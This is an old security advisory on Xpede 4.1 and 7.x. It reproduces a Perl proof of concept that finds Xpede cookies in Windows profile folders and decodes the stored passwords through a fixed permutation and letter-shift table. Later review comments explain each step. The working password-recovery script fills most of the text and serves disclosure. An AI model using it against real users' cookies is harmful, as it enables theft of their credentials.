


Xpede cookie password decode



25th Mar 2002 [SBWID-5208]
COMMAND

	Xpede cookie password decode

SYSTEMS AFFECTED

	Xpede 4.1 and 7.x series

PROBLEM

	Gregory Duchemin [c3rb3r@hotmail.com] posted :
	

	This code will decipher Xpede cookie-based passwords. That makes the
	cookies dangerous, since there are many cross-site scripting vulns in
	the program through which a cookie can be disclosed.
	

	 Proof of concept (password recovery from cookies)

	 ================

	

	#!/usr/bin/perl

	# Xdeep.pl, search for and decipher Xpede passwords stored in these damn cookies

	# Pr00f of concept, not to be used for illegal purposes.

	#

	# Author: Gregory Duchemin Aka c3rb3r // March 2002

	#

	#output format

	# Report template used by the bare `write` call in the decode loop: one
	# left-justified field each for the user id, real name, company and the
	# still-encoded password read from a cookie file.
	# NOTE(review): the picture fields have fixed widths, so a longer value
	# is cut off in this summary; the decoding works on $password itself,
	# not on what is printed here.
	

	format STDOUT =

	+ Userid: @<<<<<<<

	$userid

	+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<

	$realname

	+ Company: @<<<<<<<<<<<<<<<<<<<<

	$company

	+ Encoded password: @<<<<<<<<<<<<<<<<<<<<

	$password

	.

	

	

	#Cookie fingerprint

	# A cookie file is treated as an Xpede cookie when its first line starts
	# with this string (see the index() test in the search loop).
	$signature=\"defPWD\";

	

	

	

	#decoding stuff

	# Three constant tables drive the decoding further down:
	#   @PERMU  1-based source positions used to reorder the characters,
	#   @ALPHA  the 52-letter alphabet, A-Z followed by a-z,
	#   @SHIFT  a per-position offset added to a letter's @ALPHA index,
	#           taken modulo 52.
	# NOTE(review): all three are literals and are applied unchanged to every
	# cookie the script reads, so nothing beyond the cookie contents is needed
	# to recover the password. As shown here the stored value is a reversible
	# encoding with one fixed table for all users, not a per-user secret.
	@PERMU=(\'9\', \'11\', \'2\', \'6\', \'4\', \'10\', \'1\', \'8\', \'7\', \'3\', \'5\');

	@ALPHA=

	(\'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\', \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\'

	, \'P\', \'Q\', \'R\',\'S\', \'T\', \'U\', \'V\', \'W\', \'X\', \'Y\', \'Z\', \'a\',\'b\',\'c\',\'d\',\'

	e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\'

	,\'z\');

	@SHIFT=(9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);  

	

	

	#Change the following path to match your system

	# Candidate files: every *@*.txt inside each user profile's Cookies
	# directory on the local machine. The script reads local files only.
	@COOKIE= glob

	(\'c:\\winnt\\Profiles\\*\\Cookies\\*@*.txt\');

	

	

	

	# $count: number of candidate files examined; $i: next free slot in
	# @FOUND, which after the loop is also the number of matches.
	$i=$count=0;

	# Placeholder entry; slot 0 is overwritten by the first match.
	@FOUND= (\'nope\');

	

	print \"\\n\\nXdeep.pl  Xpede cookies finder and decoder 

	\\n\\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 --

	\\n\\n\\n\";

	

	# Pass 1: open every candidate file and keep the names of those whose
	# first line starts with $signature.
	foreach $try (@COOKIE) {

	$count++;

	# NOTE(review): two-argument open with a bareword handle. The name comes
	# from glob(); the three-argument form with a lexical handle is the safer
	# idiom because it never interprets mode characters inside the name.
	# Files that cannot be opened are skipped silently.
	if (open(handle, $try)) 

	{

	@lines=<handle>;

	# index() returns 0 only when the line begins with the signature, so the
	# negation is true for a match at position 0 and false for any other
	# position or for no match (-1).
	if (!index($lines[0], $signature))

	{

	printf(\"\\n+ Xpede cookie found ! yep :)  <=>  %s\\n\", 

	$try);

	$FOUND[$i]=$try;

	$i++;

	}

	close(handle);  

	}

	

	}

	

	printf(\"\\n+ %d files checked.\\n\", $count);

	

	# Nothing matched: report it and stop before the decode pass.
	if (! $i)

	{

	print \"\\n\\n- No Xpede cookie found, sorry\\n\\n\";

	exit(0);

	}

	

	printf(\"\\n\\n+ %d Cookie(s) found.\\n\", $i);

	print \"\\n\\n\\n[Press return]\\n\";

	# Wait for the operator; the line read is discarded ($try is reassigned
	# by the next loop).
	$try=<STDIN>;

	

	# Pass 2: for each cookie file kept by the search loop, print its fields
	# and decode the stored password.
	# NOTE(review): every input used below is either a line of the cookie
	# file or one of the constant tables. That is why disclosure of the
	# cookie (for example through the cross-site scripting issues the
	# advisory mentions) amounts to disclosure of the password, and why the
	# advisory's interim advice is to remove the cookies.
	foreach $try (@FOUND) {

	

	if (open(handle, $try)) 

	{

	@lines=<handle>;

	

	# Fields are taken from fixed line numbers of the file.
	# presumably these offsets follow the layout of the cookie file as the
	# browser writes it -- TODO confirm against a sample file.
	# @lines[N] is a one-element slice; assigned to a scalar it yields that
	# element. No chomp is applied, so each value keeps its line terminator.
	$userid= @lines[55];

	$realname=@lines[64];

	$password=@lines[46];

	$company=@lines[28];

	

	# Undo URL encoding, step 1. There is no /g flag, so at most one match
	# per field is replaced by a space.
	# NOTE(review): the page shows the pattern with doubled backslashes,
	# likely an extraction artefact of an escaped '+' -- confirm.
	$realname =~ s/\\+/ /;

	$userid =~ s/\\+/ /;

	$password =~ s/\\+/ /;

	$company =~ s/\\+/ /;

	

	# Undo URL encoding, step 2: every %XX pair (case-insensitive, all
	# occurrences) becomes the single byte with that hex value.
	$userid =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex

	($1))/eig; 

	$realname =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex

	($1))/eig; 

	$password =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex

	($1))/eig; 

	$company =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex

	($1))/eig; 

	

	printf \"\\n+ Found Xpede cookie :\\n>> %s <<\\n\\n\", $try;

	# Emits the four fields through the STDOUT format defined at the top.
	write;

	print \"\\n\\n! Cr4cking 1n progr3ss ... \\n\";

	

	# One list element per character of the encoded value.
	@list=split //, $password;

	

	

	

	

	# Values longer than 12 characters are split: the leading $DIFF
	# characters are copied as-is into $REST (reported as the "clear part")
	# and removed from @list, leaving $MAX = 11 characters to decode.
	# Shorter values are decoded whole, with $MAX = length - 1.
	# presumably the "-1" discounts the line terminator kept on $password
	# -- confirm.
	if (length($password) > 12 ) 

	{

	$MAX = 11;

	$DIFF = length($password)-1-$MAX;

	for ($i = 0; $i < ($DIFF); $i++) {$REST = $REST.$list

	[$i]; }

	splice(@list, 0, ($DIFF));

	printf \"\\n+ Clear part is %s\\n\", $REST;

	}

	else {$MAX = length($password)-1;printf \"\\n- No clear 

	part found \\n\";}

	

	

	

	# Reordering step: output position i takes the character found at the
	# 1-based position $PERMU[i] of @list. The loop's third clause does
	# nothing; $i advances through the $i++ inside the subscript.
	for ($i=0; $i<$MAX; $i) { $temp_pass = 

	$temp_pass.$list[$PERMU[$i++]-1]; }

	printf \"\\n+ Permutations give %s\\n\", $temp_pass;

	

	

	# Substitution step: a character present in @ALPHA is replaced by the
	# letter $SHIFT[i] places further on, wrapping at 52; any other
	# character is copied unchanged ($flag stays 0).
	# NOTE(review): $a and $b are the package variables sort() uses; no sort
	# is called in this script, so reusing them here has no visible effect.
	@list=split //, $temp_pass;

	for ($i=0; $i<$MAX; $i++) 

	{

	$b = ord($list[$i]);

	$c = $SHIFT[$i];

	$flag=0;

	

	

	for ($z=0; $z<52; $z+=1) 

	{

	 if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA

	[($z+$c)%52]);$flag=1;}

	} 

	

	if (!$flag) {$a = $b;}

	

	

	$decode = $decode.chr($a);

	printf \"\\n+ %s Shift(%d) \\t --> \\t%s\", chr($b), $c, chr

	($a);

	}

	

	printf \"\\n\\n+ Shifting with secret key give %s\\n\", 

	$decode; 

	# The final value is the decoded part followed by the clear part.
	printf \"\\n! Password is \\\"%s\\\"\\n\\n\", $decode.$REST;

	printf \"\\n\\n- End.\\n\\n\";

	

	# Clear the accumulators so the next cookie starts from empty strings.
	$decode=$REST=$temp_pass=\"\";

	close(handle);

	

	print \"\\n\\n[Press return]\\n\";

	$try=<STDIN>;

	}

	}

	

SOLUTION

	Remove the Xpede cookies until a patch is released.

